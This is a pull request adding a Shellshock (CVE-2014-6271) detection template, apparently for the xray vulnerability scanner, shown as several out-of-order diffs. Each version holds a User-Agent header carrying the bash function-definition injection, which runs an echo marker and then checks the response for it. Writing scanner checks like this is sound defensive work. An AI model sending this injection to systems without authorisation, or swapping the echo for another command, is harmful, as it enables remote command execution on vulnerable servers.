### PR TITLE
add poc of bash-cve-2014-6271

### DIFF
--- a/pocs/bash-cve-2014-6271.yml
+++ b/pocs/bash-cve-2014-6271.yml
@@ -2,8 +2,8 @@ name: poc-yaml-bash-cve-2014-6271
 rules:
   - method: GET
     headers:
-      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo xszyuh23sh762g'"
+      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo helloworld2019 | base64'"
     follow_redirects: false
-    expression: status == 200 && body.bcontains(b'xszyuh23sh762g')
+    expression: status == 200 && body.bcontains(b'aGVsbG93b3JsZDIwMTkK')
 detail:
   author: neal1991(https://github.com/neal1991)

--- a/pocs/bash-cve-2014-6271.yml
+++ b/pocs/bash-cve-2014-6271.yml
@@ -1,7 +1,6 @@
 name: poc-yaml-bash-cve-2014-6271
 rules:
   - method: GET
-    path: 
     headers:
       User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo xszyuh23sh762g'"
     follow_redirects: false

--- a/pocs/bash-cve-2014-6271.yml
+++ b/pocs/bash-cve-2014-6271.yml
@@ -7,3 +7,5 @@ rules:
     expression: body.bcontains(b'aGVsbG93b3JsZDIwMTkK')
 detail:
   author: neal1991(https://github.com/neal1991)
+  links:
+    - https://github.com/opsxcq/exploit-CVE-2014-6271

--- a/pocs/bash-cve-2014-6271.yml
+++ b/pocs/bash-cve-2014-6271.yml
@@ -3,8 +3,8 @@ rules:
   - method: GET
     path: 
     headers:
-      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo xrayisnb001'"
+      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo xszyuh23sh762g'"
     follow_redirects: false
-    expression: status == 200 && body.bcontains(b'xrayisnb001')
+    expression: status == 200 && body.bcontains(b'xszyuh23sh762g')
 detail:
   author: neal1991(https://github.com/neal1991)

--- a/pocs/bash-cve-2014-6271.yml
+++ b/pocs/bash-cve-2014-6271.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-bash-cve-2014-6271
+rules:
+  - method: GET
+    path: 
+    headers:
+      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo xrayisnb001'"
+    follow_redirects: false
+    expression: status == 200 && body.bcontains(b'xrayisnb001')
+detail:
+  author: neal1991(https://github.com/neal1991)

--- a/pocs/bash-cve-2014-6271.yml
+++ b/pocs/bash-cve-2014-6271.yml
@@ -4,6 +4,6 @@ rules:
     headers:
       User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo helloworld2019 | base64'"
     follow_redirects: false
-    expression: status == 200 && body.bcontains(b'aGVsbG93b3JsZDIwMTkK')
+    expression: body.bcontains(b'aGVsbG93b3JsZDIwMTkK')
 detail:
   author: neal1991(https://github.com/neal1991)


### PR DESCRIPTION


## 本 poc 是干什么的

测试 shellshock 漏洞 CVE-2014-6271

## 测试环境

可以使用这个 https://github.com/opsxcq/exploit-CVE-2014-6271 docker 环境复现

